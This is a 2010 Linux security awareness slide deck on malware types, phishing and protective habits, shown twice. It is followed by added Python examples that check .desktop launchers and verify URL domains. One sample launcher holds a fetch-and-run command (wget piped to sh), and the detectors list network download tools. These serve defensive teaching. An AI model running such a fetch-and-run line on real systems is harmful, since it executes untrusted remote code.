Linux Security Myth

                                Mackenzie Morgan

                                 Ohio LinuxFest 2010


                                11 September 2010




Mackenzie Morgan (OLF 2010)        Linux Security Myth   11 September 2010   1 / 35
Introduction


Outline



1     Introduction


2     Vocabulary


3     What can still hurt me?


4     What protection is there?






Me




     Mackenzie Morgan
     Computer Science student
     Ubuntu Developer
     Kubuntu user
     http://ubuntulinuxtipstricks.blogspot.com ← find slides here






This Talk




     Linux Zealot: Try Linux! It doesn’t get viruses!
     Average Person: No viruses? I’m invincible!




Vocabulary




Malware




Malware (or “badware”) is an umbrella term for viruses, trojans, worms,
rootkits, etc.






Virus




Viruses infect individual files. They spread when people share those files.






Social Engineering




Social Engineering is tricking people into doing something that is bad for
security.






Trojan




Trojans are malware that get installed via social engineering... or, well,
lying.
“I’m a fun game and totally safe! but not really, I’m actually going to steal your
passwords...”






Worm




A worm infects other systems, automatically, usually over a network.






Botnet




A botnet is a group of systems infected by malware which operate as a
collective and are controlled by a erm... jagoff.
Yes, I’m from Pittsburgh. How’d you guess?






Rootkit




A rootkit keeps the activities of an unauthorised user hidden so that you
can’t tell your system has been owned.






Keylogger




A keylogger tracks everything you type. Yes, including passwords.
It could be hardware (see ThinkGeek), but usually software. There are
legitimate(-ish) uses.






Browser-based Attack


A browser-based attack is any attack that takes place inside the web
browser. They are usually not limited to a specific OS.
Examples:
     Cross-site Scripting (XSS) – using JavaScript on one webpage to steal data from another
     Tracking cookies – harvesting the information stored in your browser by other websites
     Cookie jacking – stealing credentials for other websites from your browser’s cookies
     Click jacking – hiding clickable objects on a webpage on top of other objects so that you’re not clicking what you think you’re clicking





Phishing




Phishing is social engineering aimed at making you believe you are
interacting with someone else whom you trust.




What can still hurt me?




What’s still a problem?




All of those






But what about no viruses?




     Windows ones usually won’t run, even in Wine
     Several hundred for Linux
     Only ∼30 in the wild ever
     No known viruses exploiting current vulnerabilities






Email Trojans




“Check out this cool new game! http://example.com/foo.desktop”






Untrusted Software




.deb for “screensaver” on gnome-look.org
...and now you’re on a botnet
http://ubuntuforums.org/showthread.php?t=1349678






Browser-based attacks




     Unless only for Internet Explorer
     Firefox? Opera? Chrome?






Phishing




There’s no patch for gullibility






Rootkits




If any of the previous work, the attacker might install one




What protection is there?




Trusted software sources




     Stick to your distro’s repos
     Otherwise, source directly from upstream
     Avoid non-software in .deb or .rpm format
     Heed warnings about failed signature checks
     Arch Linux does not sign packages






Launchers




You get a .desktop from web/email...
Do you know what it’ll run?
Could be anything
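
To answer "do you know what it'll run?" before anyone double-clicks, the launcher can be read as text. The sketch below is an added example, not part of the original slides; the word lists, function names and both sample launchers are assumptions constructed for illustration.

```python
import os
import shlex

# Names below are assumptions made for this example, not a standard list.
INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl", "ruby"}
FETCHERS = {"wget", "curl"}
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")

# Constructed samples (not real files).
SAMPLE_SUSPICIOUS = """\
[Desktop Entry]
Type=Application
Name=Cool New Game
Icon=applications-games
Exec=sh -c "/tmp/.cache/update --quiet"
"""

SAMPLE_BENIGN = """\
[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
"""


def parse_desktop_entry(text):
    """Return the key/value pairs of the [Desktop Entry] group.

    Other groups (for example [Desktop Action ...]) are skipped, so their
    own Exec= lines are not inspected here.
    """
    entry, in_main = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_main = line == "[Desktop Entry]"
        elif in_main and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def exec_argv(exec_value):
    """Split an Exec= value into argv, dropping field codes like %f or %U.

    shlex approximates the quoting rules of the Desktop Entry format.
    """
    try:
        argv = shlex.split(exec_value)
    except ValueError:          # unbalanced quotes
        return []
    return [a for a in argv
            if not (len(a) == 2 and a[0] == "%" and a[1].isalpha())]


def inspect_launcher(text):
    """Return (argv, warnings) describing what the launcher would run."""
    entry = parse_desktop_entry(text)
    if entry.get("Type") == "Link":
        return [], ["opens URL: " + entry.get("URL", "(none)")]
    argv = exec_argv(entry.get("Exec", ""))
    if not argv:
        return [], ["no usable Exec= line in [Desktop Entry]"]

    warnings = []
    program = os.path.basename(argv[0])
    if program in INTERPRETERS:
        warnings.append(program + " is an interpreter; the real command is in its arguments")
    # Look inside every argument, including an inline 'sh -c "..."' string.
    words = [w for arg in argv for w in arg.split()]
    if any(os.path.basename(w) in FETCHERS for w in words):
        warnings.append("calls a network download tool")
    if any(w.startswith(TEMP_DIRS) or "/." in w for w in words):
        warnings.append("references a temporary or hidden path")
    return argv, warnings


if __name__ == "__main__":
    for label, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        argv, warnings = inspect_launcher(sample)
        print(label, "->", argv)
        for w in warnings:
            print("   warning:", w)
```

The friendly Name= and Icon= keys say nothing about the Exec= line, which is why the check reads only the latter.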






Launchers in KDE






Launchers in GNOME

Fedora’s & openSUSE’s GNOME:




Ubuntu’s GNOME:




Ubuntu has a policy against “ignore this security warning” buttons




Browser - JavaScript




Use NoScript
Users might not be equipped to know what to allow, but it blocks
cross-site scripting & click-jacking






Browser - Encryption




Don’t send passwords unencrypted!
Lock icon:
Means connection is encrypted and probably no man-in-the-middle
NOT necessarily a sign that all is good!






Browser - Phishing

But how do you know it’s the site it claims to be?
Look at everything before the third slash—that’s the domain




Check out this green thing
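
The "everything before the third slash" rule has two catches: that part can also hold a user name and a port, and a domain is read from its right-hand end. The check below is an added example, not from the original slides; `analyse_url`, the sample URLs and the use of example.com as the trusted site are assumptions for illustration.

```python
from urllib.parse import urlsplit


def analyse_url(url, expected_domain):
    """Compare the host a URL really points at with the domain you expect."""
    url = url.strip()
    # The slide's rule, taken literally: scheme + "//" + authority.
    before_third_slash = "/".join(url.split("/", 3)[:3])
    try:
        parts = urlsplit(url)
        host = parts.hostname        # drops "user@" and ":port", lower-cases
    except ValueError:               # e.g. malformed IPv6 literal
        parts, host = None, None
    if host is None or parts.scheme not in ("http", "https"):
        return {"before_third_slash": before_third_slash, "host": None,
                "userinfo_present": False, "punycode": False, "matches": False}

    host = host.rstrip(".")
    expected = expected_domain.lower().rstrip(".")
    return {
        "before_third_slash": before_third_slash,
        "host": host,
        # Anything left of "@" is a user name, not the site.
        "userinfo_present": "@" in parts.netloc,
        # "xn--" labels are encoded non-ASCII names that can imitate Latin letters.
        "punycode": any(label.startswith("xn--") for label in host.split(".")),
        # Domains are read right to left: the expected name must be the
        # whole host or its rightmost labels.
        "matches": host == expected or host.endswith("." + expected),
    }


# Constructed URLs; example.com stands in for the site the user trusts.
SAMPLES = [
    "https://www.example.com/login",
    "https://EXAMPLE.com:8443/login",
    "https://example.com.login.example.net/",
    "https://example.com@login.example.net/account",
    "https://notexample.com/",
]

if __name__ == "__main__":
    for u in SAMPLES:
        r = analyse_url(u, "example.com")
        print("%-48s host=%-30s ok=%s" % (u, r["host"], r["matches"]))
```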



Minimal privileges




Don’t log in graphically as root!
Why?
Malware gets full access






Don’t need it? Don’t use it!




Don’t log in remotely via the command line or push files to the machine?
Uninstall your SSH and S/FTP servers






Detecting problems



Find rootkits:
     rkhunter
     chkrootkit
Warn of changes:
     tripwire
Warn of attacks:
     snort
These are advanced tools






Questions?




Slides will be posted:
http://ubuntulinuxtipstricks.blogspot.com





Linux Security Myth: What Can Still Hurt Me

  • 1. Linux Security Myth Mackenzie Morgan Ohio LinuxFest 2010 11 September 2010 Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 1 / 35
  • 2. Introduction Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 2 / 35
  • 3. Introduction Me Mackenzie Morgan Computer Science student Ubuntu Developer Kubuntu user http://ubuntulinuxtipstricks.blogspot.com ← find slides here Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 3 / 35
  • 4. Introduction This Talk Linux Zealot: Try Linux! It doesn’t get viruses! Average Person: No viruses? I’m invincible! Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 4 / 35
  • 5. Vocabulary Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 5 / 35
  • 6. Vocabulary Malware Malware (or “badware”) is an umbrella term for viruses, trojans, worms, rootkits, etc. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 6 / 35
  • 7. Vocabulary Virus Viruses infect individual files. They spread when people share those files. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 7 / 35
  • 8. Vocabulary Social Engineering Social Engineering is tricking people into doing something that is bad for security. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 8 / 35
  • 9. Vocabulary Trojan Trojans are malware that get installed via social engineering. . . or, well, lying. “I’m a fun game and totally safe! but not really, I’m actually going to steal your passwords. . . ” Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 9 / 35
  • 10. Vocabulary Worm A worm infects other systems, automatically, usually over a network. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 10 / 35
  • 11. Vocabulary Botnet A botnet is a group of systems infected by malware which operate as a collective and are controlled by a erm. . . jagoff. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 11 / 35
  • 12. Vocabulary Botnet A botnet is a group of systems infected by malware which operate as a collective and are controlled by a erm. . . jagoff. Yes, I’m from Pittsburgh. How’d you guess? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 11 / 35
  • 13. Vocabulary Rootkit A rootkit keeps the activities of an unauthorised user hidden so that you can’t tell your system has been owned. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 12 / 35
  • 14. Vocabulary Keylogger A keylogger tracks everything you type. Yes, including passwords. It could be hardware (see ThinkGeek), but usually software. There are legitimate(-ish) uses. Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 13 / 35
  • 15. Vocabulary Browser-based Attack A browser-based attack is any attack that takes place inside the web browser. They are usually not limited to a specific OS. Examples: Cross-site Scripting (XSS) – using Javascript on one webpage to steal data from another Tracking cookies – harvests the information stored in your browser by other websites Cookie jacking – stealing credentials for other websites from your browser’s cookies Click jacking – hiding clickable objects on a webpage on top of other objects so that you’re not clicking what you think you’re clicking Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 14 / 35
  • 16. Vocabulary Phishing Phishing is social engineering aimed at making you believe you are interacting with someone else whom you trust Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 15 / 35
  • 17. What can still hurt me? Outline 1 Introduction 2 Vocabulary 3 What can still hurt me? 4 What protection is there? Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 16 / 35
  • 18. What can still hurt me? What’s still a problem? All of those Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 17 / 35
  • 19. What can still hurt me? But what about no viruses? Windows ones usually won’t run, even in Wine Several hundred for Linux Only ∼30 in the wild ever No known viruses exploiting current vulnerabilities Mackenzie Morgan (OLF 2010) Linux Security Myth 11 September 2010 18 / 35
  • 20. What can still hurt me? Email Trojans: “Check out this cool new game! http://example.com/foo.desktop”
  • 21. What can still hurt me? Untrusted Software: .deb for “screensaver” on gnome-look.org
  • 22. What can still hurt me? Untrusted Software: .deb for “screensaver” on gnome-look.org... and now you’re on a botnet. http://ubuntuforums.org/showthread.php?t=1349678
  • 23. What can still hurt me? Browser-based attacks: Unless only for Internet Explorer
      • Firefox?
      • Opera?
      • Chrome?
  • 24. What can still hurt me? Phishing: There’s no patch for gullibility
  • 25. What can still hurt me? Rootkits: If any of the previous work, the attacker might install one
  • 26. What protection is there? Outline: 1 Introduction; 2 Vocabulary; 3 What can still hurt me?; 4 What protection is there?
  • 27. What protection is there? Trusted software sources
      • Stick to your distro’s repos
      • Otherwise, source directly from upstream
      • Avoid non-software in .deb or .rpm format
      • Heed warnings about failed signature checks
      • Arch Linux does not sign packages
  • 28. What protection is there? Launchers: You get a .desktop from web/email... Do you know what it’ll run?
  • 29. What protection is there? Launchers: You get a .desktop from web/email... Do you know what it’ll run? Could be anything
  • 30. What protection is there? Launchers in KDE
  • 31. What protection is there? Launchers in GNOME. Fedora’s & openSUSE’s GNOME: Ubuntu’s GNOME: Ubuntu has a policy against “ignore this security warning” buttons
  • 32. What protection is there? Browser - Javascript
      • Use NoScript
      • Users might not be equipped to know what to allow, but it blocks cross-site scripting & click-jacking
  • 33. What protection is there? Browser - Encryption
      • Don’t send passwords unencrypted!
      • Lock icon: Means connection is encrypted and probably no man-in-the-middle
      • NOT necessarily a sign that all is good!
  • 34. What protection is there? Browser - Phishing
      • But how do you know it’s the site it claims to be?
      • Look at everything before the third slash—that’s the domain
      • Check out this green thing
  • 35. What protection is there? Minimal privileges: Don’t log in graphically as root! Why? Malware gets full access
  • 36. What protection is there? Don’t need it? Don’t use it! Don’t log in remotely with command line or push files to it? Uninstall your SSH and S/FTP servers
  • 37. What protection is there? Detecting problems
      • Find rootkits: rkhunter, chkrootkit
      • Warn of changes: tripwire
      • Warn of attacks: snort
      • These are advanced tools
  • 38. What protection is there? Questions? Slides will be posted: http://ubuntulinuxtipstricks.blogspot.com
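The launcher slides (28 and 29) ask whether you know what a .desktop file from the web or email will run. One way to answer that before opening it, as an added example that is not part of the original slides; the sample launcher, the interpreter and fetcher lists and the function names are constructed for illustration:

```python
import re
import shlex

# Constructed sample: a launcher named like a game whose Exec line is a shell pipeline.
SAMPLE = """\
[Desktop Entry]
Type=Application
Name=Cool New Game
Exec=sh -c "wget -q -O - http://example.com/foo.sh | sh"
"""

INTERPRETERS = {"sh", "bash", "dash", "zsh", "python", "python3", "perl"}  # assumed list
FETCHERS = {"wget", "curl"}                                                # assumed list

def exec_lines(text):
    """Return (group, command) for every Exec= key, Desktop Action groups included."""
    found, group = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
        elif group and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            if key.strip() == "Exec":
                found.append((group, value.strip()))
    return found

def warnings_for(command):
    """List the reasons a command deserves a closer look before it is launched."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a plain split
        argv = command.split()
    program = argv[0].rsplit("/", 1)[-1] if argv else ""
    reasons = []
    if program in INTERPRETERS:
        reasons.append("starts an interpreter (%s) instead of a named application" % program)
    if FETCHERS & set(re.findall(r"[A-Za-z0-9_.-]+", command)):
        reasons.append("fetches content from the network")
    if re.search(r"[|;&]", command):
        reasons.append("chains several commands together")
    return reasons

def inspect_launcher(text):
    """Map each Exec command in a .desktop file to its list of warnings."""
    return {command: warnings_for(command) for _, command in exec_lines(text)}

if __name__ == "__main__":
    for command, reasons in inspect_launcher(SAMPLE).items():
        print("Would run:", command, "| warnings:", reasons)
```

The checks are heuristics: an empty warning list means nothing obvious was found, not that the launcher is safe.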
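Slide 34 says the domain is everything before the third slash. The added example below (not from the original slides) applies that rule with Python's standard URL parser and compares the result with the site the reader expects; the links and the function names are constructed for illustration:

```python
from urllib.parse import urlsplit

def real_host(url):
    """Return the host the browser would contact: no scheme, user name, port or path."""
    return (urlsplit(url).hostname or "").rstrip(".").lower()

def check_link(url, expected_domain):
    """Compare a link with the domain the reader believes it leads to."""
    parts = urlsplit(url)
    host = real_host(url)
    expected = expected_domain.lower()
    problems = []
    # The expected name must be the END of the host, not merely appear inside it.
    if host != expected and not host.endswith("." + expected):
        problems.append("host %s is not part of %s" % (host, expected))
    if parts.scheme != "https":
        problems.append("connection is not encrypted")
    if "@" in parts.netloc:
        problems.append("text before '@' is a user name, not the site")
    return host, problems

# Constructed links that all show "example.com" somewhere before the third slash.
LINKS = [
    "https://www.example.com/login",
    "http://www.example.com/login",
    "https://www.example.com.account-check.example.net/login",
    "https://www.example.com@203.0.113.7/login",
]

if __name__ == "__main__":
    for link in LINKS:
        host, problems = check_link(link, "example.com")
        print(link, "->", host, problems or "looks like example.com")
```

The last two links show why the whole stretch before the third slash has to be read right to left: the name nearest the slash, after any `@`, is the site actually contacted.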